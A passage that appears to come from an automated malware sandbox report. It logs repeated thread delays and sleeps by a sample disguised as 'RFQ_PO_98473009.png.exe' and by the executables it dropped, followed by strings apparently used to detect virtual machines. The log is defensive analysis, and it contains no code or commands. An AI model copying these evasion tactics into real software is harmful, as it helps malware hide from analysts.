                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 594343
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 600000
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 599875
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 599765
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 599656
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 599546
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 599436
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 599327
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 599219
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 599109
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 599000
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 598890
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 598781
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 598672
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 598561
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 598453
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 598343
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 598234
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 598124
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 598015
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 597906
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 597796
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 597687
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 597576
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 597465
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 597327
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 597217
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 597107
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 597000
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 596891
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 596766
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 596641
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 596531
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 596422
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 596313
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 596188
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 596063
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 595953
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 595844
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 595719
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 595609
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 595500
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 595390
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 595281
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 595172
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 595062
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 594927
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 594812
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 594673
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 594521
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 594380
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6444Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7825Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeWindow / User API: threadDelayed 2162
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeWindow / User API: threadDelayed 7675
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeWindow / User API: foregroundWindowGot 1651
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeWindow / User API: threadDelayed 5939
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeWindow / User API: threadDelayed 3913
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe TID: 7396Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7820Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7732Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7848Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7768Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 7976Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 6164Thread sleep time: -30000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020Thread sleep time: -29514790517935264s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020Thread sleep time: -600000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020Thread sleep time: -599875s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020Thread sleep time: -599764s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020Thread sleep time: -599652s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020Thread sleep time: -599531s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020Thread sleep time: -599422s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020Thread sleep time: -599309s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020Thread sleep time: -599187s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020Thread sleep time: -599078s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020Thread sleep time: -598968s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020Thread sleep time: -598859s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020Thread sleep time: -598750s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020Thread sleep time: -598640s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020Thread sleep time: -598531s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020Thread sleep time: -598421s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020Thread sleep time: -598312s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020Thread sleep time: -598202s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020Thread sleep time: -598093s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020Thread sleep time: -597982s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020Thread sleep time: -597840s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020Thread sleep time: -597710s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020Thread sleep time: -597594s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020Thread sleep time: -597469s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020Thread sleep time: -597359s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020Thread sleep time: -597250s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020Thread sleep time: -597140s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020Thread sleep time: -597031s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020Thread sleep time: -596922s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020Thread sleep time: -596812s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020Thread sleep time: -596703s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020Thread sleep time: -596593s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020Thread sleep time: -596484s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020Thread sleep time: -596375s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020Thread sleep time: -596232s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020Thread sleep time: -596109s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020Thread sleep time: -596000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020Thread sleep time: -595890s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020Thread sleep time: -595781s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020Thread sleep time: -595672s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020Thread sleep time: -595562s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020Thread sleep time: -595453s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020Thread sleep time: -595343s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020Thread sleep time: -595234s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020Thread sleep time: -595125s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020Thread sleep time: -595015s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020Thread sleep time: -594906s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020Thread sleep time: -594797s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020Thread sleep time: -594672s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020Thread sleep time: -594562s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020Thread sleep time: -594452s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 8020Thread sleep time: -594343s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exe TID: 8096Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -32281802128991695s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -600000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -599875s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -599765s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -599656s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -599546s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -599436s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -599327s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -599219s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -599109s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -599000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -598890s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -598781s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -598672s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -598561s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -598453s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -598343s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -598234s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -598124s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -598015s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -597906s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -597796s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -597687s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -597576s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -597465s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -597327s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -597217s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -597107s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -597000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -596891s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -596766s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -596641s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -596531s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -596422s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -596313s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -596188s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -596063s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -595953s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -595844s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -595719s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -595609s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -595500s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -595390s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -595281s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -595172s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -595062s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -594927s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -594812s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -594673s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -594521s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 2000Thread sleep time: -594380s >= -30000s
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 600000
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 599875
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 599764
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 599652
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 599531
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 599422
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 599309
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 599187
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 599078
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 598968
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 598859
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 598750
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 598640
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 598531
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 598421
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 598312
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 598202
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 598093
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 597982
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 597840
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 597710
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 597594
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 597469
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 597359
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 597250
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 597140
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 597031
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 596922
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 596812
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 596703
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 596593
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 596484
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 596375
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 596232
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 596109
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 596000
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 595890
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 595781
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 595672
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 595562
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 595453
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 595343
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 595234
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 595125
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 595015
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 594906
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 594797
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 594672
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 594562
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 594452
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 594343
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 600000
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 599875
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 599765
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 599656
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 599546
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 599436
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 599327
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 599219
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 599109
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 599000
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 598890
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 598781
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 598672
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 598561
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 598453
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 598343
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 598234
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 598124
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 598015
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 597906
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 597796
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 597687
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 597576
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 597465
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 597327
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 597217
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 597107
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 597000
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 596891
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 596766
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 596641
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 596531
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 596422
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 596313
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 596188
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 596063
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 595953
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 595844
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 595719
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 595609
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 595500
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 595390
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 595281
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 595172
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 595062
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 594927
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 594812
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 594673
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 594521
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeThread delayed: delay time: 594380
                      Source: RFQ_PO_98473009.png.exe, 00000000.00000002.1234608709.0000000007958000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: r&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}d_
                      Source: Native_New-Nova.exe, 0000000A.00000002.3618535161.0000000000757000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllJ$no
